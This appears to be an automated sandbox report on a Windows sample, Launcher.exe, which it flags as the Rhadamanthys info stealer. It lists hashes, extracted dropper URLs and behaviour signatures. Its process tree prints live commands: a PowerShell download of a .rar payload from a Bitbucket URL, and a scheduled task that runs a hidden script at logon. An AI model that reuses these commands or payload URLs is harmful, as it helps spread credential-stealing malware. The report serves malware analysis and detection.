Analysis

  • max time kernel: 6s
  • max time network: 43s
  • platform: windows11-21h2_x64
  • resource: win11-20240508-en
  • resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted: 24-05-2024 13:10

General

  • Target: Launcher.exe
  • Size: 7KB
  • MD5: b5e479d3926b22b59926050c29c4e761
  • SHA1: a456cc6993d12abe6c44f2d453d7ae5da2029e24
  • SHA256: fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
  • SHA512: 09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
  • SSDEEP: 192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Malware Config

  • Extracted
    Language: ps1
    Source: ps1.dropper
    URLs: https://rentry.org/lem61111111111/raw

  • Extracted (Deobfuscated)
    Language: ps1
    Source: exe.dropper
    URLs: https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2820
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2252
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe
          "C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\4CB9.tmp\4CBA.bat C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\system32\chcp.com
              chcp 1251
              5⤵
                PID:1268
              • C:\Windows\system32\findstr.exe
                findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                5⤵
                  PID:2728
                • C:\Windows\system32\findstr.exe
                  findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                  5⤵
                    PID:4848
                  • C:\Windows\system32\findstr.exe
                    findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                    5⤵
                      PID:3420
                    • C:\Windows\system32\schtasks.exe
                      schtasks /query /tn "MyBatchScript"
                      5⤵
                        PID:3112
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        5⤵
                        • Creates scheduled task(s)
                        PID:1380
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4380
                        • C:\Windows\system32\reg.exe
                          reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                          6⤵
                            PID:2340
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2060
                          • C:\Windows\system32\reg.exe
                            reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                            6⤵
                              PID:2132
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1880
                      • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe
                        "C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe"
                        3⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:2056

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: aa0a32b11dca7b04f4cc5fe8c55cb357
    SHA1: 00e354fd0754a7d721a270cdc08f970b9a3f6605
    SHA256: e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1
    SHA512: 1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: db3a2085d22f0fa009feb6060c919ace
    SHA1: d570b614adf53c54135d8ba89ba0e9a77f743e1c
    SHA256: acff94044f1e9ffa322ac7a6943f3395c35cb032ec74840ad3230718ac42adea
    SHA512: e7f23352561884e987b52e247f0b813a6527b88a0fb3176802aec0bfd3dc3e85514ebb4774d49bc267c28795de7a4f75026c9ee9681d6e3741573abe1813cc73

  • C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\4CB9.tmp\4CBA.bat
    Filesize: 6KB
    MD5: 62d6dc76d46f18df518a85ffa77fa2de
    SHA1: 2a5a9af3946ccfdc4f7eac894fa094bdf0d1f66b
    SHA256: 8fee639c4fa22551d43c8daf797bcb2269419c545447e0d5b43b66f54d69d728
    SHA512: b81945c08b55b029dfca8b14cfd106270aacec5de3be70e151b95855c533c3d02b8b19257f3347da8c085248588b65f24c07bddbf291e951a33e26e7386b6f66

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukap5mnl.um3.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe
    Filesize: 93KB
    MD5: d7e0458b48ff73bbc98182f86fc02bce
    SHA1: 58a8615c4d5b5b23fa8033effd7924df835bdcba
    SHA256: b124e36b99efaf36522d87772480869dab738d9bbfc48f4ac87988a14981b8c4
    SHA512: 9a164e5e76f42b0d223f70d70999b24782999cf48ab3ace8064ffcd88f3b3ec667e5c00a59466218c0b86cf2f0b539fbf42f9252b0aca98de3e5f81e3b89bfd2

  • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe
    Filesize: 355KB
    MD5: c93d65bc0ed7ee88d266b4be759301f8
    SHA1: 8c0c415ba824737c61904676e7132094f5710099
    SHA256: f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
    SHA512: 7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

  • memory/2056-54-0x0000000003BE0000-0x0000000003FE0000-memory.dmp
    Filesize: 4.0MB

  • memory/2056-57-0x0000000075800000-0x0000000075A52000-memory.dmp
    Filesize: 2.3MB

  • memory/2056-55-0x00007FFE45F80000-0x00007FFE46189000-memory.dmp
    Filesize: 2.0MB

  • memory/2056-59-0x0000000000520000-0x000000000058D000-memory.dmp
    Filesize: 436KB

  • memory/2056-36-0x0000000000520000-0x000000000058D000-memory.dmp
    Filesize: 436KB

  • memory/2056-53-0x0000000003BE0000-0x0000000003FE0000-memory.dmp
    Filesize: 4.0MB

  • memory/2252-58-0x0000000000FA0000-0x0000000000FA9000-memory.dmp
    Filesize: 36KB

  • memory/2252-61-0x0000000002E60000-0x0000000003260000-memory.dmp
    Filesize: 4.0MB

  • memory/2252-62-0x00007FFE45F80000-0x00007FFE46189000-memory.dmp
    Filesize: 2.0MB

  • memory/2252-64-0x0000000075800000-0x0000000075A52000-memory.dmp
    Filesize: 2.3MB

  • memory/2328-14-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-40-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-16-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-15-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-13-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-12-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp
    Filesize: 10.8MB

  • memory/2328-3-0x000001BD9E050000-0x000001BD9E072000-memory.dmp
    Filesize: 136KB

  • memory/4088-0-0x00000000009E0000-0x00000000009E8000-memory.dmp
    Filesize: 32KB

  • memory/4088-1-0x00007FFE25133000-0x00007FFE25135000-memory.dmp
    Filesize: 8KB